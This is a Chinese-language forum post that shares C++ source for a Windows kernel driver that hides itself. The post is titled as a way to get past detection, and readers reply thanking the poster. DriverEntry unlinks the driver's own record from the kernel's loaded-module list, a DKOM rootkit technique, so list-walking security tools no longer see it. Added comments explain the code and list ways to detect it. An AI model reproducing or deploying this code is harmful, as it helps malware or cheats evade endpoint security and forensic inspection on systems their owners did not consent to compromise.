C++断链隐藏驱动过检测源码
#include"ntddk.h"
/*
 * Hand-declared view of the record that DriverEntry reaches through the
 * pointer stored at byte offset 20 of the driver object.
 *
 * NOTE(review): the field order and sizes look like the 32-bit per-module
 * loader record the kernel keeps for each loaded image (the structure usually
 * called KLDR_DATA_TABLE_ENTRY / LDR_DATA_TABLE_ENTRY) - confirm against the
 * symbols of the build under analysis. The layout is undocumented and differs
 * between architectures and Windows versions, so this declaration is only
 * meaningful for the build it was written against.
 */
typedef struct _driverdata
{
/* List links; the only member DriverEntry reads or writes. */
LIST_ENTRY listentry;
/* Seven placeholder ULONGs; nothing in this listing reads them, they only
 * keep the two strings below at the intended offset. */
ULONG unknown1;
ULONG unknown2;
ULONG unknown3;
ULONG unknown4;
ULONG unknown5;
ULONG unknown6;
ULONG unknown7;
/* Not read in this listing; presumably the full image path - TODO confirm. */
UNICODE_STRING path;
/* Not read in this listing; presumably the base image name - TODO confirm. */
UNICODE_STRING name;
}driverdata;
#include "Driver.h"
/*
 * Unload routine registered by DriverEntry ("xiezai" = unload).
 *
 * qudongduixiang: the driver object being unloaded; not used here.
 *
 * Emits one debug message and returns. It performs no cleanup: nothing in
 * this routine undoes the list changes made in DriverEntry.
 */
VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{
    KdPrint(("驱动卸载\n"));
}
/*
 * Driver entry point.
 *
 * qudongduixiang: driver object passed in by the system.
 * zhucebiao:      registry path for the driver; unused in this routine.
 *
 * Returns STATUS_SUCCESS unconditionally.
 *
 * What the code does: it prints a debug message, reads a pointer stored at
 * byte offset 20 of the driver object, and - if that pointer is non-NULL -
 * rewrites the neighbouring list entries so they point past this driver's
 * own record. It then registers xiezai1 as the unload routine.
 *
 * Analysis notes for reviewers and responders:
 * - This is direct kernel object manipulation (DKOM) of a linked list. Any
 *   tool that enumerates drivers only by walking that list will no longer
 *   report this one, so treat a list walk as one view, not ground truth.
 * - Cross-view checks still expose the driver: the image is mapped before
 *   this routine runs, so load-time telemetry (for example Sysmon event ID 6,
 *   "Driver loaded") has already recorded it, and memory-forensics scans that
 *   search for module records instead of following links (for example
 *   Volatility's modscan compared with modules) show the discrepancy.
 * - The code is 32-bit specific: the (ULONG) casts truncate pointers on a
 *   64-bit build and the hard-coded offset 20 only fits one structure layout.
 *   NOTE(review): on 64-bit Windows, Kernel Patch Protection is documented to
 *   bugcheck (0x109) on loaded-module-list tampering - confirm for the target.
 * - No lock or interrupt-level change is visible around the list writes, and
 *   the record's own Flink/Blink are left untouched and never restored in
 *   this listing; instability or a bugcheck after load/unload of such a
 *   driver is therefore a plausible forensic signal.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{
KdPrint(("驱动入口开始\n"));
driverdata*driverdata1 = NULL;
/* Read the pointer stored 20 bytes into the driver object.
 * NOTE(review): on the 32-bit DRIVER_OBJECT layout this offset appears to be
 * the DriverSection field - confirm against the headers for the target. */
driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);
if (driverdata1!=NULL)
{
/* Predecessor's first pointer (Flink is the first LIST_ENTRY member) is
 * overwritten with this record's successor. */
*(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;
/* Successor's Blink is overwritten with this record's predecessor, so the
 * two neighbours now reference each other directly. */
driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;
}
/* Allow the driver to be unloaded; xiezai1 only logs a message. */
qudongduixiang->DriverUnload = xiezai1;
return STATUS_SUCCESS;
}
支持楼主,支持看流星社区,以后我会经常来! 看到这么好的资源真是高兴,楼主辛苦了!